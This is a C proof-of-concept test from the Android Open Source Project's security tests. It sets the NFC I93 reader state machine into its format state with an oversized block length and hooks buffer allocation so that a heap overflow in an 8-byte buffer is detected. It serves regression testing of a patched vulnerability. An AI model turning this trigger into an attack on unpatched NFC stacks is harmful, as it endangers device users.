1 /*
2  * Copyright (C) 2021 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <stdlib.h>
18 #include <nfc_api.h>
19 #include <nfc_int.h>
20 #include <rw_int.h>
21 #include <tags_defs.h>
22 
23 #include "../includes/common.h"
24 #include "../includes/memutils.h"
25 
26 char enable_selective_overload = ENABLE_NONE;
27 
28 // borrowed from rw_i93.cc
29 #define RW_I93_FORMAT_DATA_LEN 8
30 
31 extern tRW_CB rw_cb;
32 extern tNFC_CB nfc_cb;
33 void rw_init(void);
34 tNFC_STATUS rw_i93_select(uint8_t* p_uid);
35 void* vulnerable_ptr;
36 
GKI_getbuf(uint16_t size)37 void* GKI_getbuf(uint16_t size) {
38     void* ptr = malloc(size);
39     if (size == RW_I93_FORMAT_DATA_LEN) {
40         vulnerable_ptr = ptr;
41     }
42     return ptr;
43 }
44 
GKI_freebuf(void * p_buf)45 void GKI_freebuf(void* p_buf) {
46     if (p_buf == vulnerable_ptr) {
47         free(p_buf);
48     }
49 }
50 
main()51 int main() {
52     enable_selective_overload = ENABLE_ALL;
53     tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
54 
55     GKI_init();
56     rw_init();
57 
58     uint8_t p_uid = 1;
59     if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
60         return EXIT_FAILURE;
61     }
62 
63     tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
64     tNFC_CONN_EVT event = NFC_DATA_CEVT;
65 
66     tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
67     if (!p_data) {
68         return EXIT_FAILURE;
69     }
70 
71     p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR));
72     if (!(p_data->data.p_data)) {
73         free(p_data);
74         return EXIT_FAILURE;
75     }
76 
77     p_i93->state = RW_I93_STATE_FORMAT;
78     p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
79     p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
80     p_data->status = NFC_STATUS_OK;
81     TIMER_LIST_ENT pFirst = {};
82     nfc_cb.quick_timer_queue.p_first = &pFirst;
83 
84     p_cb->p_cback(0, event, p_data);
85     free(p_data->data.p_data);
86     free(p_data);
87     enable_selective_overload = ENABLE_NONE;
88     return EXIT_SUCCESS;
89 }
90